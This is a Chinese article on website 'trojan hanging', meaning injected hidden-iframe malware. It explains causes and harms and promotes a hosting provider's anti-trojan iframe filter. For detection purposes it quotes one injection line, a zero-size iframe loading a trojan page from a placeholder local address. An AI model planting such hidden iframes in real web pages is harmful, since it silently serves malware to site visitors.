不少用户都碰到过这样的现象:打开自己的网站,页面还没显示,杀毒软件就开始报警,提示检测到木马病毒,或者网站打开后弹出其他恶意广告窗口(如低俗图片、IP流量出售等),又或是连接到别的不知名网站……。很多网站用户不明就里,自己的网站明明是很正规的,不可能将病毒放在自己的网页上;域名解析指向正常,怎么会跳转到别的网站?那么是什么导致了以上这些现象的发生呢?有经验的用户就知道是网站被挂木马了,在一定程度上可以说是网页被篡改。
什么是网页挂马?挂马指的是黑客入侵了一些网站后,将自己编写的网页木马(其实是一段网页代码,主要以ASP和PHP代码为主)嵌入被黑网站的主页中,再上传到空间里面,当浏览者打开网页的同时这段代码被执行也会运行木马。
网站被挂马的原因多种多样。IE浏览器层出不穷的漏洞,FTP帐号密码泄密,网站程序存在的脚本缺陷等都会轻易被黑客入侵网站,尤其是企业网站,由于专业性技术人员缺乏,网站大多由第三方公司外包开发或是通过网络下载免费的建站系统来搭建,存在的缺陷较多,也最容易被挂马,而访问量越大的网站越有被挂马的可能,因为此类网站被黑客关注程度较高。
其中,不少网站用户都曾深受iframe木马其害,有经验的人员知道网页被挂马后,在IE浏览器点击查看,用记事本打开源文件,以"<iframe>"为关键字进行搜索,就会发现类似这样的代码:<iframe src="http://127.0.0.1/muma.htm" width="0" height="0" frameborder="0"></iframe>,src参数后面的是网页木马的地址。代码中设置了弹出页面的窗口长宽各为0,网站的首页打开显示正常,而木马却已经运行了。
网站被挂木马,危害是很大的。轻则导致网页浏览者的本地计算机CPU占用率极高而不得不重新启动电脑,重侧资料被盗,程序被破坏,并且一旦被google贴上此网站可能有病毒的标签,恐怕会给网站流量带来很大的损失;而且还可能成为传播网页木马的"傀儡帮凶".这无论是对企业的形象信誉,还是对管理员的技术能力都是沉重的打击。
为帮助中小企业网站防止网页木马和病毒,目前不少知名域名主机服务商在主动加强网站安全方面都有所突破。如美橙互联www.cndns.com,为有效防止客户站点被篡改而被插入恶意代码(iframe网页木马、恶意广告等),美橙空间新增防木马功能。所有虚拟主机启用iframe的网络地址调用过滤,木马代码将视为非法使用而被替换为一连串的@符号。当打开网站页面时,网页木马就不会被执行,只会看到页面上显示"@@@@@".据美橙互联技术负责人解释:对于无任何网络技术经验的网站用户来说,即使不懂页面上显示@符号的原因,也无需担心自己的站点受危害;对于站长或网络管理员来说,是提醒其要对网站进行处理,在一定程序上防止了给网站的访客带来安全风险 .固然,将网站托管在技术实力强、安全系数高、能主动帮客户解决安全的服务商处可加强自己的网站安全,更重要的是及时给自己的网站程序打上最新的补丁,使用正版的杀毒软件扫描网站程序,在开发的时候应加强安全意识,注意防止注入漏洞、上传漏洞等问题;而借助建站系统搭建网站的,尽量选择在官方合作网站上下载或购买拥有正式版权的服务,同时还要多增强对网页木马和病毒的防护技巧。 |